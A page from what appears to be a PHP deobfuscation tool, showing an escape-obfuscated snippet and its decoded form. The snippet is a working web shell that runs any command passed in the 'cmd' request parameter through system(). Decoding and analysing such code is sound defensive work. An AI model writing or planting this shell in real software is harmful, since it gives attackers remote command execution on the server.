Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
if (isset($_REQUEST["\x63\155\144"])) { echo "\74\x70\x72\145\x3e"; $cmd = $_REQUEST["\14..
Decoded Output download
if (isset($_REQUEST["cmd"])) { echo "<pre>"; $cmd = $_REQUEST["cmd"]; system($cmd); echo "</pre>"; } __halt_compiler();?>
Did this file decode correctly?
Original Code
if (isset($_REQUEST["\x63\155\144"])) { echo "\74\x70\x72\145\x3e"; $cmd = $_REQUEST["\143\x6d\x64"]; system($cmd); echo "\x3c\57\x70\162\145\76"; } __halt_compiler();?>
Function Calls
system | 1 |
Stats
MD5 | 4c83a04e61840f6d1ebc1141c0e2bb2e |
Eval Count | 0 |
Decode Time | 36 ms |